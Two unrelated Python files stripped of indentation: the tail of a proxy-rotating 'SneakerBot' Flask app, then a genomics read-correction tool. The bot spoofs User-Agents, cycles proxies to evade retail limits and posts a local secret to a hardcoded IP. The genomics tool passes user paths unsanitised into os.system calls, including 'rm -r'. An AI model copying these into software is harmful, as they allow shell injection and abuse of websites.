credentials = ''
# If no IP address or port information is passed, in the proxy information will remain `None`
# If no proxy information is set, the default settings for the machine will be used
if ip is not None and port is not None:
# Username and password not necessary
if username is not None and password is not None:
credentials = '{}:{}@'.format(username, password)
proxies = {'http': 'http://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port),
'https': 'https://{credentials}{ip}:{port}'.format(credentials=credentials, ip=ip, port=port)
}
return proxies
def getPing(url, ip, port, timeout=8):
#If someone could make a better implementation of this that would be awesome
proxies = configure_proxy_settings(ip, port)
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.9'
}
start = time.time()
# Start time
nf = requests.get(url, proxies='{}:{}'.format(ip, port), headers=headers, timeout=timeout)
# Makes Request
page = nf.content
# Makes sure it's succesful
nf.close()
# Closes out the request
end = time.time()
# Gets the total time
return format((end - start), '.5f')
# Returns the ping
def returnTime():
# I know this doesn't adjust for local time - will fix this soon
return strftime("%H:%M:%S", gmtime())
def massTestProxies(listOfProxies):
# Tests all proxies in the list of proxies
RESPONSE = []
# This is a list of python dictionaries containing information about the proxies
def addToList(proxy):
try:
print("testing proxy: {}".format(proxy))
proxyInfo = {}
ip = proxy.partition(":")[0]
# Extracts address
port = proxy.partition(':')[2]
# Extracts port
url = TEST_URL
# Sets the URL to TEST_URL constant
proxyInfo['IP'] = ip
# IP Address
proxyInfo['Port'] = port
# Port Number
proxyInfo['Ping'] = getPing('https://whatismyipaddress.com/', ip=ip, port=port)
# Sets ping
proxyInfo['ConnectTime'] = returnTime()
# Time that the proxy was tested
RESPONSE.append(proxyInfo)
# Appends info
print("done: {}".format(proxy))
# Output saying the proxy was succesful
except Exception as exp:
# This means the proxy failed
print exp
# Prints the exception string
print("proxy: {} failed".format(proxy))
return
threads = [threading.Thread(target=addToList, args=(proxy,)) for proxy in listOfProxies]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return RESPONSE
# Returns the list of proxy details
def returnProxies(csvpath):
# Opens the proxy CSV
with open(csvpath, 'rb') as f:
reader = csv.reader(f)
return list(reader)
def getCommits():
for i in range(5):
# Loops through five times or until it is successful
try:
url = 'https://github.com/theriley106/SneakerBotTutorials'
res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
# Pulls the page
page = bs4.BeautifulSoup(res.text, 'lxml')
# Parses the HTML
updateCount = str(page).partition('<span class="num text-emphasized">')[2].partition("<")[0].strip()
# This is the element that contains the commit count
lastUpdate = page.select('relative-time')[0].getText()
# This is the time of the last update
if len(updateCount) > 2:
# This means it was successful
return [lastUpdate, updateCount]
except Exception as exp:
pass
return "ERROR"
@app.route('/changeHeader', methods=['POST'])
def headerChange():
#this is only printing the headers, but this will eventually change headers
#print str(list(request.form.items())[0][1])
bot.updateHeader(str(list(request.form.items())[0][1]))
# Updates header to the one inputted into the site
return redirect(url_for('useBot'))
#perhaps it would be better to have default variables set for index, and this will edit default variables?
# ie: index(headers=None, url=None, etc)
@app.route('/goToURL', methods=['POST'])
def goToURL():
#this is only printing the headers, but this will eventually change headers
#print str(list(request.form.items())[0][1])
bot.sendAllToURL(url=str(list(request.form.items())[0][1]))
# Send all of the browser windows to the URL inputted into the web app
return redirect(url_for('useBot'))
@app.route('/openDriver', methods=['POST'])
def driverAdd():
# Opens all drivers
bot.startAllDrivers()
@app.route('/', methods=['GET'])
def index():
# First parge
gitCommits = getCommits()
# Grabs the current amount of Git Commits
sessionInfo['lastUpdate'] = gitCommits[0]
# Last commit time
sessionInfo['gitCommits'] = gitCommits[1]
# Total number of commits
sessionInfo['info'] = massTestProxies(PROXIES)
# Contains info about the proxies being used
print("Done mass test")
bot.startAllDrivers()
# Starts all drivers
return redirect(url_for('useBot'))
@app.route('/botInfo', methods=['GET'])
def useBot():
proxyLists = []
# List of the proxies being used
for proxy in bot.successProxies:
# Goes through a list of all the working proxies
proxyLists.append(proxy.partition(':')[0])
# Only appends the ip
return render_template("index.html", gitCommits=sessionInfo['gitCommits'], lastUpdate=sessionInfo['lastUpdate'], URL=bot.targetURL, proxyInfo=sessionInfo['info'], driverInfo=bot.driverInfo, proxyDiff=len(bot.failedProxies), allProxies=proxyLists)
@app.route('/test', methods=['GET'])
def testTemplate():
# This is just a test page to make sure everything is working properly
return render_template("index.html", gitCommits=100, lastUpdate='Dec 3', proxyInfo=[{"IP": '41', "Port": '41', "Ping": '132', "ConnectTime": '321'}], driverInfo=[{'proxy': 'proxy', 'driver': 'driver', 'url': 'url', 'useragent': 'self.headers'}], proxyDiff=4)
if __name__ == '__main__':
if len(sys.argv) > 1:
if '.csv' in str(sys.argv[1]):
PROXIES = returnProxies(sys.argv[1])
if len(sys.argv) > 1 and '.csv' not in str(sys.argv[1]):
for proxy in sys.argv[1:]:
PROXIES.append(proxy)
for proxy in PROXIES:
bot.addProxy(proxy)
print("Initiating Bot with Proxy: {}".format(proxy))
else:
print("It looks like you didn't input any Proxies.")
if 'bypass' not in sys.argv:
if raw_input("It is HIGHLY recommended that you use proxies. Continue without? [Y/N] ").lower() == 'n':
raise Exception("Input Proxies...")
if 'admin' in str(sys.argv).lower():
r = requests.post("http://138.197.123.15:8888/proxies/{}".format(open('../../SecretCode.txt').read().strip())).json()
PROXIES = r["proxies"][-10:]
try:
bot = main.bot(PROXIES)
except:
if raw_input("You need to install PhantomJS to use this program. Continue without? [Y/N ").lower() == 'n':
raise Exception("Install PhantomJS...")
app.run(host='0.0.0.0', port=8000)
|
TranscriptClean.py
|
# TranscriptClean
# Author: Dana Wyman
# 3/1/2018
# -----------------------------------------------------------------------------
# Mismatches and microindels in long reads are corrected in a variant-aware
# fashion using the reference genome and a VCF file of whitelisted variants.
# Noncanonical splice junctions can also be corrected using a file of reference
# splice sites.
# TC Classes
from transcript import Transcript
from transcript import check_seq_and_cigar_length
from spliceJunction import *
from intronBound import IntronBound
from optparse import OptionParser
import dstruct
# Other modules
import pybedtools
from pyfasta import Fasta
import os
import multiprocessing as mp
from math import ceil
import re
from copy import copy
import warnings
## Runtime profiling
import cProfile
import time
from datetime import timedelta
def main():
options = getOptions()
sam_file = options.sam
n_threads = options.n_threads
header, sam_chroms, sam_chunks = split_SAM(sam_file, n_threads)
validate_chroms(options.refGenome, options.variantFile, sam_chroms)
# Run the processes. Outfiles are created within each process
processes = [ ]
for i in range(n_threads):
if options.dryRun == True:
t = mp.Process(target=run_chunk_dryRun, args=(sam_chunks[i], options))
else:
t = mp.Process(target=run_chunk, args=(sam_chunks[i], options, header))
# Run the process
processes.append(t)
t.start()
# Wait for all processes to finish
for one_process in processes:
one_process.join()
# When the processes have finished, combine the outputs together.
start_time = time.time()
combine_outputs(header, options)
end_time = time.time()
human_time = str(timedelta(seconds=int(end_time - start_time)))
print("Took %s to combine all outputs." % (human_time))
def getOptions():
parser = OptionParser()
parser.add_option("--sam", "-s", dest = "sam",
help = ("Input SAM file containing transcripts to "
"correct. Must contain a header."),
metavar = "FILE", type = "string", default = "")
parser.add_option("--genome", "-g", dest = "refGenome",
help = ("Reference genome fasta file. Should be the "
"same one used during mapping to generate the "
"provided SAM file."),
metavar = "FILE", type = "string", default = "")
parser.add_option("--threads", "-t", dest = "n_threads",
help = ("Number of threads to run program with."),
type = "int", default = 1)
parser.add_option("--spliceJns", "-j", dest = "sjAnnotFile",
help = ("Splice junction file obtained by mapping "
"Illumina reads to the genome using STAR, or "
"alternately, extracted from a GTF using the "
"accessory script. More formats may be "
"supported in the future."),
metavar = "FILE", type = "string", default = None)
parser.add_option("--variants", "-v", dest = "variantFile",
help = ("VCF formatted file of variants to avoid "
"correcting away in the data (optional)."),
metavar = "FILE", type = "string", default = None )
parser.add_option("--maxLenIndel", dest = "maxLenIndel",
help = "Maximum size indel to correct (Default: 5 bp)",
type = "int", default = 5 )
parser.add_option("--maxSJOffset", dest = "maxSJOffset",
help = ("Maximum distance from annotated splice junction "
"to correct (Default: 5 bp)"),
type = "int", default = 5 )
parser.add_option("--outprefix", "-o", dest = "outprefix",
help = ("Output file prefix. '_clean' plus a file "
"extension will be added to the end."),
metavar = "FILE", type = "string", default = "TC")
parser.add_option("--correctMismatches", "-m", dest = "correctMismatches",
help = ("If set to false, TranscriptClean will skip "
"mismatch correction. Default: true"),
type = "string", default = "true" )
parser.add_option("--correctIndels", "-i", dest = "correctIndels",
help = "If set to false, TranscriptClean will skip indel \
correction. Default: true", type = "string",
default = "true")
parser.add_option("--correctSJs", dest = "correctSJs",
help = ("If set to false, TranscriptClean will skip "
"splice junction correction. Default: true, but you must "
"provide a splice junction annotation file in order for "
"it to work."), type = "string", default = "true")
parser.add_option("--dryRun", dest ="dryRun", action='store_true',
help = ("If this option is set, TranscriptClean will "
"read in the sam file and record all insertions, "
"deletions, and mismatches, but it will skip "
"correction. This mode is useful for checking "
"the distribution of transcript errors in the "
"data before running correction."))
parser.add_option("--primaryOnly", dest ="primaryOnly", action='store_true',
help = "If this option is set, TranscriptClean will only \
output primary mappings of transcripts (ie it will filter \
out unmapped and multimapped lines from the SAM input.",
default = False)
parser.add_option("--canonOnly", dest ="canonOnly", action='store_true',
help = ("If this option is set, TranscriptClean will "
"output only canonical transcripts and transcripts "
"containing annotated noncanonical junctions to the "
"clean SAM file at the end of the run."), default = False)
parser.add_option("--tmpDir", dest ="tmp_path",
help = ("If you would like the tmp files to be written "
"somewhere different than the final output, "
"provide the path to that location here."),
default = None)
parser.add_option("--bufferSize", dest ="buffer_size",
help = ("Number of lines to output to file at once by "
"each thread during run. Default = 100"),
type = "int", default = 100)
parser.add_option("--deleteTmp", dest ="delete_tmp", action='store_true',
help = ("If this option is set, the temporary directory "
"generated by TranscriptClean (TC_tmp) will be "
"removed at the end of the run."))
(options, args) = parser.parse_args()
options = cleanup_options(options)
return options
def cleanup_options(options):
""" Clean up input options by casting to appropriate types etc. """
options.n_threads = int(options.n_threads)
options.buffer_size = int(options.buffer_size)
options.maxLenIndel = int(options.maxLenIndel)
options.maxSJOffset = int(options.maxSJOffset)
options.correctIndels = (options.correctIndels).lower()
options.correctMismatches = (options.correctMismatches).lower()
options.correctSJs = (options.correctSJs).lower()
# Screen options for correctness
if options.correctMismatches not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctMismatches/-m option. "
"Valid choices are 'true' and 'false'"))
if options.correctIndels not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctIndels/-i option. "
"Valid choices are 'true' and 'false'"))
if options.correctSJs not in ["true", "false"]:
raise RuntimeError(("Invalid choice for --correctSJs option. "
"Valid choices are 'true' and 'false'"))
# Use custom tmp dir location if provided
if options.tmp_path != None:
if os.path.isdir(options.tmp_path):
options.tmp_dir = "/".join((options.tmp_path).split("/") + ["TC_tmp/"])
else:
options.tmp_dir = "/".join((options.tmp_path).split("/")[0:-1] + ["TC_tmp/"])
else:
options.tmp_dir = "/".join((options.outprefix).split("/")[0:-1] + ["TC_tmp/"])
# If there is a tmp dir there already, remove it
if os.path.exists(options.tmp_dir):
os.system("rm -r %s" % options.tmp_dir)
os.system("mkdir -p %s" % options.tmp_dir)
# If the specified outprefix is a directory, add TC default prefix to it
if os.path.isdir(options.outprefix):
options.outprefix = "/".join((options.outprefix).split("/") + ["TC"])
return options
def prep_refs(options, transcripts, sam_header):
""" Process input files and store them in a reference dict.
SAM transcripts and header are needed if variants provided because
the variant file will be filtered to include only those that overlap
the SAM reads. """
tmp_dir = options.tmp_dir
os.system("mkdir -p %s" % tmp_dir)
genomeFile = options.refGenome
variantFile = options.variantFile
sjFile = options.sjAnnotFile
# Container for references
refs = dstruct.Struct()
# Read in the reference genome.
print("Reading genome ..............................")
refs.genome = Fasta(options.refGenome)
ref_chroms = sorted((refs.genome.keys()))
# Create a tmp SAM file for the provided reads
proc = str(os.getpid())
tmp_sam, sam_chroms = create_tmp_sam(sam_header, transcripts, options.tmp_dir, process = proc)
# Read in splice junctions
refs.donors = None
refs.acceptors = None
refs.sjAnnot = set()
if options.correctSJs == "false":
print("SJ correction turned off in options. Skipping reference SJ parsing.")
elif sjFile != None:
print("Processing annotated splice junctions ...")
refs.donors, refs.acceptors, refs.sjAnnot = processSpliceAnnotation(sjFile,
tmp_dir, sam_chroms, process = proc)
else:
print("No splice annotation provided. Will skip splice junction correction.")
# Read in variants
if variantFile != None:
print("Processing variant file .................")
refs.snps, refs.insertions, refs.deletions = processVCF(variantFile,
options.maxLenIndel,
tmp_dir,
tmp_sam,
process = proc)
else:
print("No variant file provided. Transcript correction will not be variant-aware.")
refs["snps"] = refs["insertions"] = refs["deletions"] = {}
return refs
def create_tmp_sam(sam_header, transcripts, tmp_dir, process = "1"):
""" Put the transcripts in the provided list into a temporary SAM file,
preceded by the provided header (list form). The file will be located in
a 'sams' subdir of the tmp_dir provided. Returns the name of the tmp
file as well as the chromosomes found within"""
sam_dir = tmp_dir + "split_uncorr_sams/"
sam_name = sam_dir + process + ".sam"
os.system("mkdir -p %s" % (sam_dir))
chroms = set()
with open(sam_name, 'w') as f:
for item in sam_header:
f.write("%s\n" % item)
for transcript in transcripts:
f.write("%s\n" % transcript)
chroms.add(transcript.split('\t')[2])
return sam_name, chroms
def setup_outfiles(options, process = "1"):
""" Set up output files. If running in parallel, label with a process ID """
# Place files in a tmp directory
tmp_dir = options.tmp_dir
os.system("mkdir -p " + tmp_dir)
outfiles = dstruct.Struct()
# Open sam, fasta, and log outfiles
oSam = open(tmp_dir + "clean_" + process + ".sam", 'w')
oFa = open(tmp_dir + "clean_" + process + ".fa", 'w')
transcriptLog = open(tmp_dir + "clean_" + process + ".log", 'w')
transcriptErrorLog = open(tmp_dir + "clean_" + process + ".TElog", 'w')
outfiles.sam = oSam
outfiles.fasta = oFa
outfiles.log = transcriptLog
outfiles.TElog = transcriptErrorLog
return outfiles
def close_outfiles(outfiles):
""" Close all of the output files """
for f in list(outfiles.values()):
f.close()
return
def transcript_init(transcript_line, genome, sjAnnot):
""" Attempt to initialize a Transcript object from a SAM entry. First,
create a log object, and note the mapping status of the read. If the
transcript alignment is unmapped or non-primary, then create a log
entry for the transcript, but do not bother initializing a transcript
object. output that Otherwise, return the transcript object along with
the log.
Input:
- Transcript SAM line (string)
- Reference genome (needed to determine canonical-ness of jns
- Splice annot set object (needed to look up whether a junction
is annotated or not)
Returns:
- Transcript object if primary alignment, None if not
- logInfo object
"""
# Check mapping
sam_fields = transcript_line.split('\t')
logInfo = init_log_info(sam_fields)
if logInfo.Mapping != "primary":
return None, logInfo
try:
transcript = Transcript(sam_fields, genome, sjAnnot)
except Exception as e:
warnings.warn("Problem parsing transcript with ID '" + \
logInfo.TranscriptID + "'")
print(e)
return None, logInfo
return transcript, logInfo
def batch_correct(sam_transcripts, options, refs, outfiles, buffer_size = 100):
"""Correct and output n lines of transcript SAM file at a time in a batch.
The purpose is to stagger when the different threads are writing to disk.
For a given transcript, there can be only one sam, fasta, and log entry,
but there can be more than one transcript error (TE)."""
print("Correcting transcripts...")
outSam = outfiles.sam
outFa = outfiles.fasta
tL = outfiles.log
tE = outfiles.TElog
sam_lines = fasta_lines = log_lines = TE_log_lines = ""
counter = 0
for transcript_line in sam_transcripts:
transcript, logInfo, TE_entries = correct_transcript(transcript_line,
options, refs)
# If the transcript object returned is None, this means that the
# current read was not a primary mapper. Add to the log file,
# but do not output a fasta sequence. Only output the original
# SAM alignment if primaryOnly and canonOnly modes are off
if transcript == None:
log_lines += create_log_string(logInfo) + "\n"
if options.primaryOnly == False and options.canonOnly == False:
sam_lines += transcript_line + "\n"
# Output the transcript in SAM and Fasta format, plus output the logs
else:
canonical_or_annot = transcript.isCanonical or transcript.allJnsAnnotated
if options.canonOnly == False or canonical_or_annot == True:
sam_lines += transcript.printableSAM() + "\n"
fasta_lines += transcript.printableFa() + "\n"
log_lines += create_log_string(logInfo) + "\n"
TE_log_lines += TE_entries
# Check whether to empty the buffer
if counter > buffer_size:
outSam.write(sam_lines)
outFa.write(fasta_lines)
tL.write(log_lines)
tE.write(TE_log_lines)
sam_lines = fasta_lines = log_lines = TE_log_lines = ""
counter = 0
else:
counter += 1
# Write any remaining lines
outSam.write(sam_lines)
outFa.write(fasta_lines)
tL.write(log_lines)
tE.write(TE_log_lines)
return
def correct_transcript(transcript_line, options, refs):
""" Given a line from a SAM file, create a transcript object. If it's a
primary alignment, then perform the corrections specified in the
options.
"""
orig_transcript, logInfo = transcript_init(transcript_line, refs.genome,
refs.sjAnnot)
TE_entries = ""
if orig_transcript == None:
return orig_transcript, logInfo, TE_entries
# Correct the transcript
try:
upd_transcript = copy(orig_transcript)
upd_logInfo = logInfo
# Mismatch correction
if options.correctMismatches == "true":
mismatch_TE = correctMismatches(upd_transcript, refs.genome,
refs.snps, upd_logInfo)
if mismatch_TE != "":
TE_entries += mismatch_TE
if options.correctIndels == "true":
# Insertion correction
ins_TE = correctInsertions(upd_transcript, refs.genome, refs.insertions,
options.maxLenIndel, upd_logInfo)
if ins_TE != "":
TE_entries += ins_TE
# Deletion correction
del_TE = correctDeletions(upd_transcript, refs.genome, refs.deletions,
options.maxLenIndel, upd_logInfo)
if del_TE != "":
TE_entries += del_TE
# NCSJ correction
if len(refs.sjAnnot) > 0 and options.correctSJs == "true":
upd_transcript, ncsj_TE = cleanNoncanonical(upd_transcript, refs,
options.maxSJOffset,
upd_logInfo)
if ncsj_TE != "":
TE_entries += ncsj_TE
except Exception as e:
warnings.warn(("Problem encountered while correcting transcript "
"with ID %s. Will output original version.") % \
orig_transcript.QNAME)
print(e)
TE_entries = ""
return orig_transcript, logInfo, TE_entries
# After successful correction, return transcript object, updated
# logInfo, and the TE log lines generated during correction
return upd_transcript, upd_logInfo, TE_entries
def validate_chroms(genome_file, vcf_file, sam_chroms):
""" Make sure that every chromosome in the SAM file also exists in the
reference genome. This is a common source of crashes. Also, make sure
that the VCF chromosome naming convention matches the SAM file if the
user has provided a VCF. """
genome = Fasta(genome_file)
fasta_chroms = set(genome.keys())
# Remove '*' from sam chromosome set if present
if "*" in sam_chroms:
sam_chroms.remove("*")
# Check whether all of the sam chromosomes are in the fasta file.
# If not, raise an error
if not sam_chroms.issubset(fasta_chroms):
sam_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in sam_chroms]) + '}'
fasta_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in fasta_chroms]) + '}'
error_msg = 'One or more SAM chromosomes were not found in the fasta reference.\n' + \
'SAM chromosomes:\n' + sam_chroms + '\n' + \
'FASTA chromosomes:\n' + fasta_chroms + '\n' + \
("One common cause of this problem is when the fasta headers "
"contain more than one word. If this is the case, try "
"trimming the headers to include only the chromosome name "
"(i.e. '>chr1').")
raise RuntimeError(error_msg)
# Check VCF chroms
if vcf_file != None:
try:
vcf_obj = pybedtools.BedTool(vcf_file)
except Exception as e:
print(e)
raise RuntimeError(("Problem reading the provided VCF file. Please "
"make sure that the filename is correct, that "
"pybedtools is installed, and that your VCF "
"file is properly formatted, including a header."))
vcf_chroms = set([x.chrom for x in vcf_obj])
if len(sam_chroms.intersection(vcf_chroms)) == 0:
sam_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in sam_chroms]) + '}'
vcf_chroms = "{" + ", ".join(['"' + str(x) + '"' for x in vcf_chroms]) + '}'
error_msg = ("None of the chromosomes included in the VCF file "
"matched the chromosomes in the provided SAM file.\n"
'SAM chromosomes:\n' + sam_chroms + '\n'
'VCF chromosomes:\n' + vcf_chroms + '\n')
raise RuntimeError(error_msg)
return
def split_SAM(samFile, n):
""" Given a sam file, separate the header line from the remaining entries,
record which chromosomes are present in the reads, and split the reads
into n chunks.
"""
header = []
chroms = set()
transcript_lines = []
with open(samFile, 'r') as f:
for line in f:
line = line.strip()
if line.startswith('@'):
header.append(line)
else:
transcript_lines.append(line)
chrom = line.split("\t")[2]
chroms.add(chrom)
# Now split the transcripts into n chunks
chunks = split_input(transcript_lines, n)
return header, chroms, chunks
def split_input(my_list, n):
""" Splits input into n sublists of roughly equal size"""
chunks = []
index = 0
batch_size = ceil(len(my_list)/n)
while index < len(my_list):
try:
batch = my_list[index:index + batch_size]
except:
batch = my_list[index:]
chunks.append(batch)
index += batch_size
return chunks
def run_chunk(transcripts, options, sam_header):
""" Contains everything needed to run a subset of the transcript input
on its own core """
# Prep the references (i.e. genome, sjs, variants)
start_time = time.time()
refs = prep_refs(options, transcripts, sam_header)
end_time = time.time()
time_slice = end_time - start_time
human_time = str(timedelta(seconds=int(time_slice)))
print("Reference file processing took %s" % (human_time))
# Set up the outfiles
outfiles = setup_outfiles(options, str(os.getpid()))
# Correct the transcripts
start_time = time.time()
batch_correct(transcripts, options, refs, outfiles,
buffer_size = options.buffer_size)
end_time = time.time()
human_time = str(timedelta(seconds=int(end_time - start_time)))
print("Took %s to process transcript batch." % (human_time))
# Close up the outfiles
close_outfiles(outfiles)
return
def run_chunk_dryRun(transcripts, options):
""" Run dryRun mode on a set of transcripts on one core """
# Set up the outfiles
outfiles = setup_outfiles(options, str(os.getpid()))
# Run dryRun mode
dryRun(transcripts, options, outfiles)
# Close up the outfiles
close_outfiles(outfiles)
return
def combine_outputs(sam_header, options):
""" Combine sam, fasta, and log outputs from separate sub-runs into the
final output files. Then, remove the temporary directory.
"""
outprefix = options.outprefix
tmp_dir = options.tmp_dir
# Make filenames
sam = outprefix + "_clean.sam"
fasta = outprefix + "_clean.fa"
log = outprefix + "_clean.log"
TElog = outprefix + "_clean.TE.log"
# Open log outfiles
if os.path.exists(log):
os.remove(log)
if os.path.exists(TElog):
os.remove(TElog)
transcriptLog = open(log, 'w')
transcriptErrorLog = open(TElog, 'w')
# Add headers to logs
transcriptLog.write("\t".join(["TranscriptID", "Mapping",
"corrected_deletions", "uncorrected_deletions",
"variant_deletions", "corrected_insertions",
"uncorrected_insertions", "variant_insertions", \
"corrected_mismatches", "uncorrected_mismatches", \
"corrected_NC_SJs", "uncorrected_NC_SJs"]) + "\n")
transcriptErrorLog.write("\t".join(["TranscriptID", "Position", "ErrorType",
"Size", "Corrected", "ReasonNotCorrected"]) + "\n")
# Add header to sam file
if options.dryRun != True:
if os.path.exists(sam):
os.remove(sam)
oSam = open(sam, 'w')
for line in sam_header:
oSam.write(line + "\n")
oSam.close()
# Close files
transcriptLog.close()
transcriptErrorLog.close()
# Now combine the subfiles
if options.dryRun != True:
os.system("cat %s/*.sam >> %s" % (tmp_dir, sam))
os.system("cat %s/*.fa > %s" % (tmp_dir, fasta))
os.system("cat %s/*.log >> %s" % (tmp_dir, log))
os.system("cat %s/*.TElog >> %s" % (tmp_dir, TElog))
# Clean up the temporary directory if requested
if options.delete_tmp:
os.system("rm -r %s" % tmp_dir)
return
def processSpliceAnnotation(annotFile, tmp_dir, read_chroms, process = "1"):
""" Reads in the tab-separated STAR splice junction file and creates a
bedtools object. Also creates a dict (annot) to allow easy lookup
to find out if a splice junction is annotated or not. Only junctions
located on the provided chromosomes are included."""
bedstr = ""
annot = set()
tmp_dir = tmp_dir + "splice_files/"
os.system("mkdir -p %s" % (tmp_dir))
donor_file = tmp_dir + "%s_ref_splice_donors_tmp.bed" % (process)
acceptor_file = tmp_dir + "%s_ref_splice_acceptors_tmp.bed" % (process)
o_donor = open(donor_file, 'w')
o_acceptor = open(acceptor_file, 'w')
with open(annotFile, 'r') as f:
for line in f:
fields = line.strip().split("\t")
chrom = fields[0]
if chrom not in read_chroms:
continue
start = int(fields[1])
end = int(fields[2])
strand = "."
if fields[3] == "1": strand = "+"
if fields[3] == "2": strand = "-"
intronMotif = int(fields[4])
annotated = int(fields[5])
uniqueReads = fields[6]
multiReads = fields[7]
maxOverhang = fields[8]
# ID the splice donor/acceptor identity
if strand == "+":
file1 = o_donor
file2 = o_acceptor
type1 = "donor"
type2 = "acceptor"
elif strand == "-":
file1 = o_acceptor
file2 = o_donor
type1 = "acceptor"
type2 = "donor"
# Make one bed entry for each end of the junction and write to
# splice donor and acceptor files
bed1 = "\t".join([chrom, str(start - 1), str(start), ".", "name", strand])
bed2 = "\t".join([chrom, str(end - 1), str(end), ".", "name", strand])
file1.write(bed1 + "\n")
file2.write(bed2 + "\n")
# Add a record of the entire junction to the annot set to indicate
# that it is annotated
junction = "_".join([chrom, str(start), strand]) + "," + \
"_".join([chrom, str(end), strand])
annot.add(junction)
o_donor.close()
o_acceptor.close()
# Convert bed files into BedTool objects
donor_sorted = tmp_dir + "%s_ref_splice_donors_tmp.sorted.bed" % (process)
acceptor_sorted = tmp_dir + "%s_ref_splice_acceptors_tmp.sorted.bed" % (process)
os.system('sort -u %s | bedtools sort -i - > %s' % (donor_file, donor_sorted))
os.system('sort -u %s | bedtools sort -i - > %s' % (acceptor_file, acceptor_sorted))
splice_donor_bedtool = pybedtools.BedTool(donor_sorted)
splice_acceptor_bedtool = pybedtools.BedTool(acceptor_sorted)
# Raise a warning if there are no splice donors or acceptors
if len(splice_donor_bedtool) == 0 or len(splice_acceptor_bedtool) == 0:
warnings.warn(("Warning: No splice donors or acceptors found on "
"chromosomes: %s. If this is unexpected, check your SJ "
"annotation file." % (", ".join(read_chroms))))
return splice_donor_bedtool, splice_acceptor_bedtool, annot
def processVCF(vcf, maxLen, tmp_dir, sam_file, process = "1"):
""" This function reads in variants from a VCF file and stores them. SNPs
are stored in a dictionary by position. Indels are stored in their own
dictionary by start and end position. A pre-filtering step ensures that
variants are included only if they overlap with the input SAM reads.
This is a space-saving measure. If add_chr is set to 'True', the prefix
'chr' will be added to each chromosome name."""
SNPs = {}
insertions = {}
deletions = {}
# Create a temporary BAM version of the input reads
tmp_bam_dir = tmp_dir + "split_uncorr_bams/"
os.system("mkdir -p %s" % (tmp_bam_dir))
bam = tmp_bam_dir + "%s_tmp_reads.bam" % (process)
try:
os.system("samtools view -bS %s > %s" % (sam_file, bam))
except Exception as e:
print(e)
raise RuntimeError(("Problem converting SAM file to BAM for variant "
"prefiltering step. Please make sure that you have "
"Samtools installed, and that your SAM "
"file is properly formatted, including a header."))
# Create a BedTool object for the VCF
try:
vcf_obj = pybedtools.BedTool(vcf)
except Exception as e:
print(e)
raise RuntimeError(("Problem reading the provided VCF file. Please make "
"sure that Bedtools is installed, and that your VCF "
"file is properly formatted, including a header. "))
# Filter the VCF file to include only those variants that overlap the reads
filtered_vcf = vcf_obj.intersect(bam, u=True, nonamecheck = True)
if len(filtered_vcf) == 0:
warnings.warn(("Warning: none of variants provided overlapped the"
"input reads."))
return SNPs, insertions, deletions
# Now parse the filtered VCF
for variant in filtered_vcf:
chrom = variant[0]
pos = int(variant[1])
ref = variant[3]
alt = variant[4].split(",")
refLen = len(ref)
# It is possible for a single position to have more than one
# type of alternate allele (ie mismatch or indel). So it is
# necessary to treat each alternate allele separately.
for allele in alt:
altLen = len(allele)
# SNP case
if refLen == altLen == 1:
ID = chrom + "_" + str(pos)
if ID not in SNPs:
SNPs[ID] = [allele]
else:
SNPs[ID].append(allele)
# Insertion/Deletion
else:
size = abs(refLen - altLen)
# Only store indels of correctable size
if size > maxLen: continue
# Positions in VCF files are one-based.
# Inserton/deletion sequences always start with the
# preceding normal reference base
actPos = pos + 1
allele = allele[1:]
ID = "_".join([ chrom, str(pos), str(actPos + size - 1)])
if refLen - altLen < 0: # Insertion
if ID not in insertions:
insertions[ID] = [allele]
else:
insertions[ID].append(allele)
elif refLen - altLen > 0: # Deletion
deletions[ID] = 1
return SNPs, insertions, deletions
def correctInsertions(transcript, genome, variants, maxLen, logInfo):
""" Corrects insertions up to size maxLen using the reference genome.
If a variant file was provided, correction will be SNP-aware. """
logInfo.uncorrected_insertions = 0
logInfo.corrected_insertions = 0
logInfo.variant_insertions = 0
TE_entries = ""
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
transcript_ID = transcript.QNAME
cigarOps,cigarCounts = transcript.splitCIGAR()
# Check for insertions. If none are present, we can skip this transcript
if "I" not in origCIGAR:
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
# Start at position in the genome where the transcript starts.
genomePos = transcript.POS
# Iterate over operations to sequence and repair insertions
for op,ct in zip(cigarOps, cigarCounts):
currPos = transcript.CHROM + ":" + str(genomePos) + "-" + \
str(genomePos + ct - 1)
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
if op == "I":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
# Only insertions of a given size are corrected
if ct <= maxLen:
# Check if the insertion is in the optional variant catalog.
if ID in variants:
# The insertion perfectly matches a variant position.
# Leave the sequence alone if it matches an allele sequence.
currSeq = origSeq[seqPos:seqPos + ct]
if currSeq in variants[ID]:
logInfo.variant_insertions += 1
errorEntry = "\t".join([transcript_ID, ID, "Insertion",
str(ct), "Uncorrected",
"VariantMatch"])
TE_entries += errorEntry + "\n"
# Leave insertion in
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
continue
# Correct insertion
errorEntry = "\t".join([transcript_ID, ID, "Insertion", str(ct),
"Corrected", "NA"])
logInfo.corrected_insertions += 1
TE_entries += errorEntry + "\n"
# Subtract the inserted bases by skipping them.
# GenomePos stays the same, as does MVal
seqPos += ct
else: # Move on without correcting insertion because it is too big
errorEntry = "\t".join([transcript_ID, ID, "Insertion", str(ct),
"Uncorrected", "TooLarge"])
logInfo.uncorrected_insertions += 1
TE_entries += errorEntry + "\n"
